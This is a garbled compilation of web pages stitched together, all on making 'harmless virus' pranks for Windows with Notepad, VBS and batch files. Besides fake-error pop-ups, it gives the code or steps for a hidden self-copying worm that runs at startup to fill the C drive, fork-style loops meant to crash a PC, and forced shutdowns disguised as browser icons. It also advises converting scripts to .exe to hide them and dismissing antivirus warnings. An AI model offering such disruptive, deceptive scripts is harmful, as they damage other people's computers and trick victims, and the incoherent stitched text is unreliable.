How to create a fake and harmless virus

Introduction: How to Make an (harmless) Fake Virus.

How to create a fake and harmless virus

Viruses are lethal, usually. But we are going to make a harmless virus that can be used to trick your friends!

Step 1: Open Notebook

Right click, then go to new –> text document

Step 2: Code

Write this code first-

1. You can write any number from 1,2,3 or 4 instead of 0 (before the ‘+’ symbol) Below is the meaning of these numbers:

1 = OK / Cancel Button,

2 = Abort / Retry / Ignore Button,

3 = Yes / No / Cancel Button,

4 = Yes / No Button,

5 = Retry / Cancel Button

2. You can write 32 or 48 or 64 instead of 16.

Below is the meaning of each number:

16 = Critical Icon,

48 = Warning Icon,

64 = Information Icon,

for this example I am going to write:

X=MsgBox(“Failed to open my computer, do you want to fix it?”,4+48,”warning”­)

Step 3: More Code

Now let’s do more code!

X=MsgBox(“Failed to open my computer. do you want to fix it?”,4+48,”warning”)
X=MsgBox(“Unable to fix error. do you want to scan your computer”,1+48,”Scan”)

X=MsgBox(“A virus was found. Delete virus?”,4+16,”Alert”)

X=MsgBox(“Unable to delete virus”,0+16,”Critical Error”)

X=MsgBox(“Virus is activated”,2+16,”alert”) X=MsgBox(“Deleting system files. “,0+16,”File Deletion”) X=MsgBox(“Virus is Copying your password”,0+16,”Virus Alert”)

X=MsgBox(“Uploading data to server. Do you want to stop it?”,3+64,”File Transfer”)

X=MsgBox(“Could not stop. File transfer complete”,0+16,”Complete”)

X=MsgBox(“Your Computer is hacked”,0+64,”Info”)

Copy this to notebook or write your own code.

Step 4: Save

go to menu –> save as

Step 5: Save (2)

save the file as my computer.vbs

Step 6: Make It a Shortcut

Right click on the folder and select Create shortcut

Step 7: Change the Picture

now rename the shortcut to My Computer

right click and select properties

Step 8: Change the Picture (2)

Click on change icon

Step 9: Change the Picture (3)

Select the icon you want, I am going to select the computer icon.

Step 10: Now Let’s TEST IT OUT

Let’s test our fake virus prank!

Step 11: FINISH

4 People Made This Project!

  • How to create a fake and harmless virus

How to create a fake and harmless virus

How to create a fake and harmless virus

How to create a fake and harmless virus

Did you make this project? Share it with us!

Recommendations

How to create a fake and harmless virus

How to create a fake and harmless virus

How to create a fake and harmless virus

How to create a fake and harmless virus

Origami Speed Challenge

How to create a fake and harmless virus

Electronics Contest

How to create a fake and harmless virus

Home and Garden Contest

How to create a fake and harmless virus

13 Comments

How to create a fake and harmless virus

hey i have a question this happned after i was done with the fake virus but this was what i typed X=MsgBox(“Failed to open my computer, do you want to fix it?”,4+48,”warning”­)
X=MsgBox(“Failed to open my computer. do you want to fix it?”,4+48,”warning”)
X=MsgBox(“Unable to fix error. do you want to scan your computer”,1+48,”Scan”)
X=MsgBox(“A virus was found. Delete virus?”,4+16,”Alert”)
X=MsgBox(“Unable to delete virus”,0+16,”Critical Error”)
X=MsgBox(“Virus is activated”,2+16,”alert”) X=MsgBox(“Deleting system files. “,0+16,”File Deletion”) X=MsgBox(“Virus is Copying your password”,0+16,”Virus Alert”)
X=MsgBox(“Uploading data to server. Do you want to stop it?”,3+64,”File Transfer”)
X=MsgBox(“Could not stop. File transfer complete”,0+16,”Complete”)
X=MsgBox(“Your Computer is hacked”,0+64,”Info”)

How to create a fake and harmless virus

How to create a fake and harmless virus

How to create a fake and harmless virus

Reply 10 months ago

Where’s the code to we help?

I made a similar one, though it has a batch file that starts the error 80 times, and then deletes itself and the VBS file, though the VBS is still running.

How many times did you try to create a Fake Virus or a prank virus to feel like a hacker or to prank someone? Sometimes you succeed sometimes not, there is often batch file creation by which you’ll create a simple virus that may also cause some issues on the computer.

But I am not going to write about any such virus that can lead to even little harm to your or your friend’s computer. This is going to be a fake virus prank.

What I am going to create is a VBS file (VBScript) which has simple codes to display various pop-up windows with lots of messages one by one, which a non-tech person cannot identify that it is really a prank and nothing else.

They might think that it is a virus and they are in trouble it’s your responsibility to tell them that there is no virus but a bunch of message box which does not harm the computer and you just pranked them.

How to Create a Fake Virus to Prank Someone (Harmless)

To make a fake virus that looks real you need to write some codes in VBS which is easy to write. It does not require knowledge of any such scripting language. You can create some pop-ups with some text written on them.

Easily add some buttons to make it look more real. You can make this virus prank on any Windows computer whether it is Windows 7, 8.1, or Windows 10.

This kind of Prank Virus is easy to create with notepad and a few lines of simple code. Follow these steps-

Step 1. Writing Sample Code

1. Open Notepad or Notepad++.

Here is the code to generate a message box on a windows computer.

X=MsgBox(“Message Description”,0+16,”Title”)

Type the above code in Notepad and save this notepad on your desktop, Give it some convincing name like “My Computer” and Save the file as .vbs extension, and select all files instead of *txt. Like My Computer.vbs

Step 2. Understanding the Code

Now open the saved file and you will a message box as shown in the image below.

In above Code X=MsgBox(“Message Description”,0+16,”Title”) here is the explanation of this code.

  1. Message Description – This is what you want to show as a Message.
  2. Button – Type of button, like OK, Yes, No, Cancel, etc
  3. Icon – Type of icon you want to show like Info icon, critical icon, etc
  4. Title – Title of message Box.

1. You can write any number from 1,2,3 or 4 instead of 0 (before the ‘+’ symbol)
Here is the meaning of these numbers:

0 = OK Button,
1 = OK / Cancel Button,
2 = Abort / Retry / Ignore Button,
3 = Yes / No / Cancel Button,
4 = Yes / No Button,
5 = Retry / Cancel Button

2. You can write 32 or 48 or 64 instead of 16.
Here is the meaning of each number:

16 = Critical Icon,
32 = Help Icon,
48 = Warning Icon,
64 = Information Icon,

Type the above code with your message, desired button, icon, and title, one line of code generates one message box so you need to write code in a separate line to generate another message box like

X=MsgBox(“Error while opening Computer. Do you want to Fix this Error?”,4+64,”Computer”)
X=MsgBox(“Unable to Fix this Error. Do you want to scan this Computer”,3+48,”Computer”)

It will look like the below image –

Type convening message with proper buttons, relative icons, and title, and save this notepad on your desktop but don’t forget to assign .vbs extension and select all files instead of *txt while saving this notepad. When you save it you will get an icon that looks like

Step 3. Changing the Icon Of Harmless Virus

You need to change the icon of this file so that victim is intended to open the file. You can change this icon to a Computer icon to make it looks original, but you can’t directly change the icon, follow this step to change the icon.

  1. Copy and paste the file to another location like in C drive.
  2. Create Shortcut – right-click on it and send it to desktop.
  3. On the desktop you will get the shortcut, Right-click on it go to properties and click on the Change icon Now select the computer icon and hit OK.

Watch This Video Tutorial to Create Prank Virus

If you face any trouble or want the similar prank Virus with exact messages as shown in the above video then you can download this file on your computer, copy and paste the code in Notepad and save it as Computer.vbs

Download Prank Virus

Just download the file on your computer and create a shortcut of it on your desktop and change its icon. You may get an error while downloading the above file that it is a Malicious file which is not at all, download it anyway.

OR Download the text file and save it as .vbs extension, Like My Computer.vbs Select all files while Saving, create a shortcut, and change the icon. You can also change this icon to Chrome, Firefox, MS Office, or any other shortcuts on your desktop.

Share this awesome fake virus prank and have Fun. 🙂

Today we are going to share some of the funniest notepad pranks with you . These pranks are totally harmless and you can share them with your friends without any fear. Follow The steps given below to create a harmless funny virus with your notepad.

Steps To Create a harmless funny virus :

Virus 1 : Continuously Ejects your the CD-ROM :

This trick will create a code in your PC which will continuously eject all the connected Optical drives. Even if you put them back , it will pop them out again and again .

Step 1 : Copy the below given code and paste it in your Notepad .

How to create a fake and harmless virus

Step 2 : Save that file with ” .vbs ” extension i.e as ” Harmless.vbs ” . You can save it with what ever name you want .

How to create a fake and harmless virus

Step 3 : Double click on the file to open . I hope you will be impressed a lot with this awesome trick.

To stop it :

=>Open your task manager by pressing ctrl+ alt+ del .
=> Go to the process tab and select the wscript.exe .
=> Now click on end process.

Virus 2 : Make a Fake Virus Batch File:

This is also a funny virus prank that I recently came across . The best thing about this prank is that it resembles an original virus attack . Just try it by yourself to see whats happens.

Step 1 : Open Notepad .

Step 2 : Copy and paste the below code in your notepad .

How to create a fake and harmless virus

Step 3 : Save this file with ” .bat ” extension i.e as ” Joke.bat ” .

How to create a fake and harmless virus

Step 4 : Double click on the file to open .

I Hope You All Like It . Share your views in form of comments ….

You love pranks? Here is the way to create / make fake and harmless virus on your computer. And you can use this fake virus to scare your friends. And I bet you, this would be real fun as it doesnot harm the PC and at the same time, it scares the other person to the hell :P.

Here is the step by step procedure to create / make fake and harmless virus:

STEP 1:

Right Click anywhere on the desktop and the click on NEW and there click on SHORTCUT button.

STEP 2:

Now, a window will pop up and will ask you to TYPE THE LOCATION OF THE ITEM. In that field, you need to type “shutdown -s -t XX -c “YY”. Where, XX represents the number of seconds you want to give before the shutdown is actually initiated. And YY represents the display message that would be displayed before shutting down your computer.

STEP 3:

Now, click on NEXT button and it would ask you to enter the name of the shortcut created. You can name it anything, so that your friend actually finds that shortcut useful and clicks on it.

And once the person clicks on that shortcut, it will display the messaged that you have entered
and will shutdown after that number of seconds. Just imagine, your friend clicks on that shortcut which will display a message saying, “You will be screwed in 60 seconds”, and after 60 seconds his computer restarts. Isn’t it worth trying? Try it and share your experience.

Recent Posts

  • Edit the Windows 7 “Send To” Menu
  • Game Booster Optimizes Your PC for Gaming in One Click
  • Windows Live Essentials 2011 Leaves Beta, Available for Download Now
  • Re-Enable Hibernate Option in Win Vista
  • Save 1-4% More Battery Life – Windows Vista
  • Archives

    • October 2010
    • September 2010
  • Categories

    Top Rated

    Email Subscription

    Blogroll

    • Increase Page Rank
  • Fake & Harmless Virus Creation.

    Learn how to create two fake and harmless viruses for windows. This is useful for a prank, getting revenge, etc.. It is safe if you follow the instructions. It’s pretty simple.

    Method 1

    Step 1:

    Right Click on your desktop, go to “New” and click “Create Shortcut

    Step 2:

    A window will come up. Where it says “Location” enter: shutdown -s -t

    Step 3:

    The rest of the location is customizable. After the -t, press space and enter the amount of time you want someone to have until shutdown in seconds with only numbers when virus is activated. Press space and enter -c then another space and in quotations, type in a comment that will appear when the computer is shutting down. Click “Next”.
    (Ex: shutdown -s -t 10 -c “WARNING: VIRUS DETECTED. BEGIN SHUTDOWN”)

    Step 4:

    On the next screen, name your virus whatever you want, it will still have the same effect. Click “OK”.

    Step 5:

    Your fake virus will be on your desktop as whatever you named it. Click to activate it. If done correctly a shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes.

    Step 6:

    TO ABORT THE FAKE VIRUS YOU MUST click the Start button on your taskbar and click run.
    Then type in: shutdown –a

    Method 2

    This is another way to make a virus, it’s completely harmless, all it does is create a folder in your all programs menu and shutdown your pc.

    Open notepad and save as DESIRED_NAME.bat
    Please note: .bat file extension is a must.

    Now write the following into that notepad file.

    cls
    :A
    color 0a
    cls
    @echo off
    echo Wscript.Sleep
    echo Wscript.Sleep 5000>C:\sleep5000.vbs
    echo Wscript.Sleep 3000>C:\sleep3000.vbs
    echo Wscript.Sleep 4000>C:\sleep4000.vbs
    echo Wscript.Sleep 2000>C:\sleep2000.vbs
    cd %systemroot%\System32
    dir
    cls
    start /w wscript.exe C:\sleep3000.vbs
    echo Deleting Critical System Files…
    echo del *.*
    start /w wscript.exe C:\sleep3000.vbs
    echo Deletion Successful!Tips

    To make your virus more convincing, you could name it Internet Explorer and then right click your shortcut to the virus, click “Properties” than click “Change Icon”. Then scroll through the list and click the Internet Explorer icon.

    Alternatively, set your “Virus” to execute every time a user logs in by navigating to:
    Start –>All Programs –>Startup(Right-Click) –>Open, and copying the shortcut into the folder that opens.
    Be careful with the shutdown timer’s value – too short an interval will make it difficult for even an experienced administrator to deactivate the virus.

    Running batch files like these in full screen can make them even scarier and more convincing.
    Right click on the icon -> Properties -> Options -> full screen do not shut computer to early or it may not scare the victim or it wont look like a virus.

    Lowell is the founder and CEO of How-To Geek. He’s been running the show since creating the site back in 2006. Over the last decade, Lowell has personally written more than 1000 articles which have been viewed by over 250 million people. Prior to starting How-To Geek, Lowell spent 15 years working in IT doing consulting, cybersecurity, database management, and programming work. Read more.

    How to create a fake and harmless virus

    Every geek wants to pretend that they are a dangerous hacker with the ability to take down any PC, and after you read this article, you can do show off your skills with nothing more than Notepad.

    Of course, we’re not making an actual virus—it’s a fake virus. In fact, it’s a test virus. But it’s still fun, and today’s article is sponsored by reader Erik, who wrote in and told us about it.

    Create a Fake Virus with Notepad

    What we’re actually doing is re-creating the same technique talked about on eicar.org’s test virus page, except we’ve got better screenshots.

    Open up a Notepad window, paste in the following text, and then save it.

    It should look exactly like this once you’ve pasted it…

    How to create a fake and harmless virus

    And then you’ll almost instantly see a big fat warning that you’ve created a virus—as long as you’ve got anti-virus installed and working, of course. If you don’t see any warning, you should probably make sure your virus scanning software is properly enabled.

    How to create a fake and harmless virus

    Your geek points will be wired to your WoW account, you dangerous hacker, you.

    Notepad – one of the basic s/w of Microsoft windows and a simple text editor that is included since Windows 1.0 i.e. since 1985. Although it is included in every single windows we guys sometimes neglect its power as there are a lot of big and beautiful text editing tools are available in the market that also provides a lot of additional cool features. But it is famous for its tricks and hacks. Here is a collection of some of the best and coolest tricks that you can try using Notepad.

    There is a list of all trick. Jump to the specific one-

    Eject CD/DVD drives automatically
    Type a message continuously and automatically
    Matrix code falling effect
    Continuously open Notepad
    Make a personal log file
    How to end .vbs scripts(not a trick, an aid for other tricks)

    1) A funny and a Harmless Virus that continuously eject CD/DVD drives – A VBS trick

    This is an awesome and a great trick that I think might be used in some horror movies also in which some ghost got into a IT building and CD rom’s start ejecting automatically. Jokes apart this VBS trick is a code which will continuously eject all your connected Optical drives and if you put them back in, it will pop them out again after few seconds. Isn’t that awesome. Copy this code and paste it in Notepad as “CDVirus.vbs” or any other name but keep “.vbs” as the extension.

    2) Continuously type a message at any writable place on screen-VBS Trick

    You want to hack you friends computer in such a way that he is left helpless and and can’t stop the your program without shutting down the system . This virus will keep on writing the given message continuously without a pause wherever it get a space to write and since you will need to restart your computer to stop this, please try this after closing all important programs. Save this file also with the extension “.vbs” like “TypingVirus.vbs” You can play with any kind of messages you want to give to your friend. I know what you are thinking right now. 😛

    3) Matrix Falling Code Effect – Notepad CMD (.BAT) Tricks

    One of the most famous and widespread bat file trick and inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as “Matrix.bat” or any other name with extension “.bat”

    How to create a fake and harmless virus Matrix- top 5 cool notepad Tricks

    4) Open Notepad continuously – Bat file

    Want to play with your friends head by continuously opening notepad that could lead to a hundreds or thousands of instances or even more and could even hang the system if the process is not stopped. Then copy the code below and save it with “.bat” extension.

    5) Make a Personal Diary(Log) with Notepad (Easter Eggs)

    Do you guys need to maintain a log file in which you have to enter date and time before every time you need to make an entry in that file than this could save you a lot of work and time and moreover will always work perfectly.

    You can use this trick to create a personal log with Notepad which will automatically include the current date and time before your note. To do so, open Notepad and type .LOG in capital letters and press Enter. Save the file. Now, every time you open this file, notepad will automatically insert the current time and date before the note. Just enter your note and save the file each time after making an entry.(But remember open this file only in Notepad given by windows not any other s/w or modified notepads like Notepad++ etc, otherwise it might not work).

    Note :- All these tricks are very cool and don’t harm anybody’s computer in any way but keep in mind that you might need to restart your computer in some cases and just finish and save your work before testing any of these.

    How to terminate VBS processes

    Now you guys might face one problem while trying files with “.vbs” extension is that you might not find how to stop these processes you have just initiated and for that follow the steps below-

    • Open your Task Manager
    • Search for a process named “wscript.exe” or “cscript.exe”.
    • Right click that process and click “End Process” and again “End Process”
    • Voila !! You have ended the process, now no more drive ejection or other hacks will work until you start them again.

    That’s all for now with a promise to return with some more amazing trick in future and If you guys have some other good trick of computer don’t forget to share with us we will publish it under your name.

    Introduction: Evil .VBS Prank Virus (100% Safe)

    How to create a fake and harmless virus

    hello today i’m showing you a vbscript prank that you can do to anyone with a computer

    its 100% safe and is not harmful to your or anyone else’s computer

    do not attempt this prank on those prone to heart attacks

    and if you are that of a douche to prank someone prone to heart attacks with a (scary) prank im not responsible

    Step 1: For Everyone Who Doesn’t Know How to Make a .VBscript|only Works on Windows

    find your note pad

    1.right click on an empty space

    2.go to NEW-text document

    Step 2: Step 2 |fixed the 4th Box

    copy paste this code into the note pad

    X=MsgBox(“deleting system32″,0+64,”windows”)
    X=MsgBox(“windows has finnished removing system32 “,0+64,”windows”) x=msgbox(“fatal error while oppening FILE NAME HERE,system32 is corrupted or missing”, 0+48, “fatal error”) x=msgbox(“searching for backup file for system 32,allow task?”, 4+16, “system 32 corrupted or missing”) x=msgbox(“unable to find backup files for system32,search for help online?”, 3+64, “critical error”) x=msgbox(“failed to load internet explorer,load additional internet browsers?”, 3+32, “internet explorer not responding”) x=msgbox(“critical error,reboot the computer?”, 4+16, “error”) variable=inputbox (“input password to reboot system”,”password”,”input password here”) X=MsgBox(“password incorrect”,2+64,”password”) variable=inputbox (“input password to reboot system”,”password”,”input password here”) X=MsgBox(“password incorrect”,2+64,”password”) variable=inputbox (“input password to reboot system”,”password”,”input password here”) X=MsgBox(“password correct”,0+16,”password”) X=MsgBox(“failed to acces data from (c/windows/syste32/FXStemp/bootdata.dll/sys=reboot”,4+16,”error”) X=MsgBox(“fatal memory_data error,we advise to shut down windows to prevent further damage “,0+64,”password”) variable=inputbox (“contact microsoft windows support”,”microsoft support”,”input request”) X=MsgBox(“request has been sent to the support team,the solution(if availible)will be sent to the following email adress:’INSERT EMAIL HERE'”,0+64,”microsoft windows support”)

    add another window if you want with the code down bellow just to tell the victim it was just a harmless prank

    NOTE:you can change the error messages with the following code

    you can change the numbers and the message icon will change

    16 = Critical Icon, 0 = only the OK button 4=yes and no

    32 = Help Icon, 1=ok and cancel 5=retry and cancel

    48 = Warning Icon, 2=abort,retry and ignore

    64 = Information Icon 3=yes, no and cancel

    Step 3: Send to Someone

    name it something like “game” or “fall of the scarlet fortress” so the firend thinks its some cool INdev game or something that the victim would most likely start wihout heisatation

    to do this create a shortcut(use preferred method)

    and change icon by going on properties

    and selecting icon and picking a creative icon you found on the internet or created or found in %SystemRoot%\system32\SHELL32.dll(the default icon pack you get with windows 7)

    all rights to the creator of the game “don’t get a virus” ,Chris Bradley

    made by cheese125

    Be the First to Share

    Did you make this project? Share it with us!

    Recommendations

    How to create a fake and harmless virus

    How to create a fake and harmless virus

    How to create a fake and harmless virus

    How to create a fake and harmless virus

    Trash to Treasure Contest

    How to create a fake and harmless virus

    Science Fair Challenge

    How to create a fake and harmless virus

    Electronics Contest

    How to create a fake and harmless virus

    5 Comments

    Question 5 months ago

    it says “this file cant be run on your pc” what do i do?

    As the name of the virus is clear we are here trying to Create a simple shout-down Virus that is not harmful to the data that is saved in the computer this type of virus automatically restarts the PC when the user Login/Start the PC. This virus Automatically shout-down the PC till the time it is programmed by the programmer and not able to do any work to the user of that PC. This type of Virus simply makes discomfort to the user and the work of the user must get hampered lot by this kind of virus, For preparation, we didn’t have to download any specific software we can start doing the Coding in Notepad and save the file as .bat Extension. For the Creation of the Virus Follow these Steps are as follows :

    Step 1: Press the Window + R Button from the Keyboard.

    How to create a fake and harmless virus

    Step 2: The Run Dialog book will Open in front of the user.

    Step 3: Type Notepad in the Dialog Box and press Enter.

    How to create a fake and harmless virus

    Now Notepad Window will Open in front of the User as shown below:

    How to create a fake and harmless virus

    Step 4: Add the following code in the Notepad as shown:

    How to create a fake and harmless virus

    Step 5: After adding all the code, save the File with the name of your choice, but remember to save the file with .bat Extension anywhere on the Computer.

    How to create a fake and harmless virus

    The Virus is Successfully Created by you but it is important to note that this will only work when it is open by the user.

    Solution:

    A message will be displayed in front of the user which is set by the Programmer. After Activating this virus the PC will Automatically Shut-Down till the time set in the Program by the Programmer. To resolve the shut-down issue of the Computer you will have to do the following things:

    • Connect the HDD in the External mode into another PC and try to find the Virus Program file and Delete that file from the HDD. This will also resolve the problem but this will only work when you got the correct file that is causing this problem. No. Antivirus will be able to find this file on the PC.
    • Reinstall the window in the Infected PC.

    Helping poeple to realise their potentials

    Virus is harmful and also interesting when you are able to know how it is being created. Today am going to teach you how to make a simple Worm Virus and that will continue creating files by copying itself on the C: drive, which will make the drive crash temporarily. Lets have Fun.

    STAGE 1

    We will log in to our computer as an administrator.

    We will create a folder on C: drive as Virus or any preferred name of your choice.

    STAGE 2

    Now we load Notepad from our programs and ready to make our new worm virus.

    Now we have opened Notepad

    We write “@echo off” on the first line.

    Then we write “Copy C: \Programs\worm.bat C:\Programs” on the second line

    Then we end it with “Start C:\Programs\worm.bat” on the third line.

    Now we are done writing.

    We click Save As and save it as Worm.bat into the folder we created.

    After saving we are ready to start our virus and make it work.

    To make your potential worm start when the computer also starts, right click on “Worm.bat” and click create shortcut. A shortcut will be created on programs.Now we Right click on the shortcut icon and click “cut“.Then we Right click on the shortcut and click “copy”.Then we also Right click on the Start Menu and click “explore“.

    After the above

    Move to All Programs, then find the file named startup.

    We Paste the copied and cutted shortcut onto the startup folder.

    Now to prevent our virus from being seen We Right click on the shortcut and go to properties, At properties we click on hidden,then press “Apply” or “OK” to hide our program.

    Congrats! We have finally created our worm virus. Now to make it start working we restart the computer and there our C drive gets fully filled.

    A ntidote:

    After creating your worm. You would want to delete or remove it from your computer. To do so

    1. Locate the folder we created to save our program or virus into.

    2. We select show hidden files then we locate our folder

    3. We delete the folder from our desktop and the recycle bin to get rid of it.

    We hope you loved our article.

    Anything bothering you. You can comment below.

    I share every trick that I find interesting with you guys. So be sure to follow our blog for latest updates!

    Top 5 Harmless Virus Pranks To Create With Notepad

    • Get link
    • Facebook
    • Twitter
    • Pinterest
    • Email
    • Other Apps

    Have you ever thought of making a virus? Or ever thought of pranking your friend with it? Well, you’re in the right place cause I’m telling you 5 awesome harmless viruses to create with a notepad to prank your friends!

    First Things First!
    First I’ll tell you how to save a file in “.bat” format, and how to convert it to “.exe” format so that your victim cannot see what code you’ve written in the file.

    To save a file in “.bat” format, follow the given steps:

      Write one of the codes that will provide in Notepad.

    Now your executable file will be created to your specified directory. But what if someone opens your file with notepad? He will understand what you wanna do and your prank plan will fail. But there is a solution to that!

    To convert “.bat” file to “.exe” file, follow the given steps:

    1. Firstly, download this BAT to EXE file from this link and extract the file using WinRar or 7-zip.
    2. You’ll see that there are 3 files in there. Run “32bit.exe” if you’re using a 32-bit windows. Else run “64bit.exe”.
    3. Now select the batch file which you created previously, and select where your “.exe” file will be saved.

    Harmless Virus Codes To Prank Your Friends:

    #1: Disable Internet

    The PC will restart 100 times continuously. You can change this value if you want to.

    #4: Open CMD Continuously Until the Computer Crashes

    #5: Fake Blue Screen of Death

    Guys if you liked my work please consider sharing it with your friends so they can also prank you and others. If you want more posts like this one then follow our blog. If you have any problem, comment down below. Thanks!

    A safe reinterpretation of https://github.com/Leurak/MEMZ Memez does not corrupt your mbr, delete files, or cause any harmful side-effects. Works on windows.

    You can build with msvs as usual. Compilation by hand is also possible; c++ -o memez memez.cpp .

    1. edit the install.ps1 and add the target username to the $username variable
    2. run install.ps1 from the root folder of the project. To verify that it was installed run Get-ScheduledTask and look for the memez*. Get-ScheduledTask also takes a -Name flag.
    • DONE Prevent users from killing memez. Just install script as admin
    • DONE Create a windows service that runs memez at a certain time/day. The install.ps1 does that
    • DONE BSOD after memez has finished. Oh boy does it.

    About

    A Harmless Windows Virus

    Resources

    Stars

    Watchers

    Forks

    Releases 3

    Packages 0

    Contributors 2

    Languages

    © 2022 GitHub, Inc.

    • Terms
    • Privacy
    • Security
    • Status
    • Docs
    • Contact GitHub
    • Pricing
    • API
    • Training
    • Blog
    • About

    You can’t perform that action at this time.

    You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.

    • Forum Archives Index
    • Off-Topic Discussion
    • How to create a fake HARMLESS Virus only using notepad|EASY|

    Good tut

    How to create a fake HARMLESS Virus only using notepad|EASY| Posted: Tue Apr 24, 2012 9:28 pm

    How to create a fake and harmless virus

      step 1: open up notepad and type this in on the first line
      MsgBox(“Your text here”),0,(“your text here”)

    step 2: Replace your text here with whatever you want it to say

    Step 3: X=MsgBox(“Your text here”,0+16,”title”)

    -This code allows you to put in symboles like a warning symbole and allows you to add options like abort retry and close in insted of ok

    -Replace your text here BTW

    Step 4: You can put as many of theses codes as you want. Here is a basic template that you can use by just copying and pasting into notepad (Or Notepad ++)

    – X=MsgBox(“a virus has been detected”,2+48,”Virus found”)

    – MsgBox(“If you would like to complete a scan click ok”),0,(“Scan”)

    – X=MsgBox(“Scanning, continue with scan?”,2+48,”Scan”)

    – MsgBox(“The virus has been found would you like to abort the virus?”),0,(“Abort?”)

    – X=MsgBox(“The virus could not bee aborted and is now deleteing all system files”,2+48,”Scan”)

    – MsgBox(“Your screwed now lolz”),0,(“lol”)

    How to change the icon of your file

    **Sorry for the bandicam thing at the top lol thats all i have to screen cap with**

    If This helped you prank your friends please leave a like and a comment!

    Last edited by Lic Wed Apr 25, 2012 7:50 pm ; edited 5 times in total

    Sometimes you are in a mood to fool your friends but are unable to think of any prank. What could be more fun to create a fake computer virus that once executed displays a ‘shutdown system‘ message and eventually shuts the system down after the specified time has elapsed. Harmless but fun!

    Any one can create this fake computer virus. In this tutorial I will demonstrate a step by step procedure on how to create a fake virus in Windows. If you find any trouble understanding the trick, drop a comment.

    How to Create a Fake Virus

    Step #1. Right click on the desktop and from the menu go to New->Shortcut,

    Step #2. A window will pop up, simply type the following command to create a fake shutdown message,

    shutdown -s -t 300 -c “This is a fake Virus!”

    • -t represents time in seconds, in this case its 300 secs (5 minutes). You can set to any value you want.
    • -c represents comment. Here you can type any comment which will appear in the shutdown message. Don’t forget to write your message between quotes as shown above.

    How to create a fake and harmless virus

    Step #3. Click Next and then you’ll be asked to enter a shortcut name,

    Step #4. Enter any shortcut name that you think is more likely to be clicked by your friends; in this tutorial however, I have entered – firefox. Click Ok and you’ll see a shortcut on your desktop.

    However there is one problem, the icon doesn’t seem to be a Firefox icon as seen below, therefore we’ll have to change the icon.

    Step #5. For this right click on the icon, click Properties->Change Icon. A warning will appear click OK.

    Step #6. Next up, you will have to select the appropriate icon against the shortcut name. If for instance, you have typed ‘Internet Explorer‘ as a shortcut name, scroll and select IE icon for this and in case you have typed Firefox or any other program, you will have to browse through the directory where that program is located. Once you are in that folder, select the icon and hit Enter.

    Presto! Now you have a proper icon. However, there is a shortcut arrow appearing on that icon. If you want to make this prank look more realistic, follow the procedure mentioned here to remove the shortcut overlay, else skip it.

    Now when ever some one will click on the icon, it will generate a system shutdown message. After the specified time is elapsed the system will shutdown. This will certainly give your friend a hard time figuring it out as to what went wrong with the system.

    How to create a fake and harmless virus

    The best part is that you can’t close it using the conventional way, no matter how hard you try, not even through the Task Manager. There is only one way to stop the counter. Here’s how:

    How To Stop ‘System Shutdown Error’ Message

    Go to Start->Run or use the WindowKey+R combination,

    Type the following command,

    -a represents Abort. The shutdown message will disappear once this command is executed.

    How to create a fake and harmless virus

    Don’t forget to share you experiences after pulling this prank on your friends. Have Fun!

    This is the best place for any one who want to be a Advanced PC user. Full of top Mysteries,Secrets,Tips,Tricks,Hacks & Cracks on computer world! Come,Watch and be Amazed .

    FriBiz, Lockerz and LifeClickz Invite

    Web forms generated by UserSpot Form

    Monday, September 22, 2008

    Create a Harmless Virus On Notepad

    How to create a harmless virus for windows.
    It is safe and easy. It’s pretty simple. And I give the solution to overcome this harmless virus.

    STEPS:
    1. Open Notepad
    2. Copy this source code below in Notepad:

    cls
    :A
    color 0a
    cls
    @echo off
    echo Wscript.Sleep 5000>C:\sleep5000.vbs
    echo Wscript.Sleep 3000>C:\sleep3000.vbs
    echo Wscript.Sleep 4000>C:\sleep4000.vbs
    echo Wscript.Sleep 2000>C:\sleep2000.vbs
    cd %systemroot%\System32
    dir
    cls
    start /w wscript.exe C:\sleep3000.vbs
    echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
    echo …………………
    echo:
    echo:
    start /w wscript.exe C:\sleep3000.vbs
    echo NEXT…………!

    echo BY ARDIANSYAH PUTRA

    echo ELECTRICAL ENGINEERING, ANDALAS UNIVERSITY, WEST SUMATERA, INDONESIA
    echo [email protected]
    echo CALL ME YACHH +6281363xxxxxx SMS JUG BOLEH LHO
    echo:
    echo:

    echo:
    echo:
    echo:
    echo SABARAN BRO…

    start /w wscript.exe C:\sleep3000.vbs
    echo ………..
    echo zzzzzzz….
    echo:
    echo:

    start /w wscript.exe C:\sleep3000.vbs
    echo OKE….Virus AKTIF!
    echo:
    echo:
    echo:

    start /w wscript.exe C:\sleep2000.vbs
    echo FIREWALL KAMU ANCUR…
    start /w wscript.exe C:\sleep2000.vbs
    echo SEMUA PROSESS UDAH DIBANTAI…
    start /w wscript.exe C:\sleep2000.vbs

    echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
    start /w wscript.exe C:\sleep2000.vbs
    echo:
    echo:
    echo:

    echo VIRUS MASUK PODIUM!
    start /w wscript.exe C:\sleep2000.vbs
    echo:
    echo:
    echo SALAM DARI SI GANTENG : ARDIANSYAHPUTRA.

    echo ARDIANSYAHPUTRA.WORDPRESS.COM
    echo:
    echo:
    echo:
    echo:

    start /w wscript.exe C:\sleep2000.vbs
    pause
    shutdown -f -s -c “BACK TO MASJID, BACK TO ISLAM.”

    3. save as whatever.bat, ex: putra.bat
    4. Activate it by click.
    5. A shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes.

    6.To Abort virus Click so that your PC is not shutdown: START – RUN and type command: shutdown -a before remaining time is over.
    look at the fig. below

    TIPS:
    1. You can copy icon *.bat into the folder of All program. Look at Fig. below.

    2.Running in full screen can make them even scarier. Right click on the icon -> properties -> options -> full screen

    • Download This Theme
      • Sub Page #1
        • Sub Sub Page #1
        • Sub Sub Page #2
        • Sub Sub Page #3
      • Sub Page #2
      • Sub Page #3
    • Template Gallery
    • Blogger Tricks

    Wednesday, 28 December 2011

    How to Make Harmless Virus that opens the notepad file Continuously

    This is step by step tutorial that explains how to make harmless virus that open the notepad file continuously.This is non-destructive virus to your computer system. If you want to have some fun with your friends , drop this cool harmless virus into his pc. .

    1) Launch Notepad
    2) Type this code into notepad

    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top

    3) save as filename.bat for example notepad.bat
    Kindly Bookmark this Post using your favorite Bookmarking service:

    Virus 1:

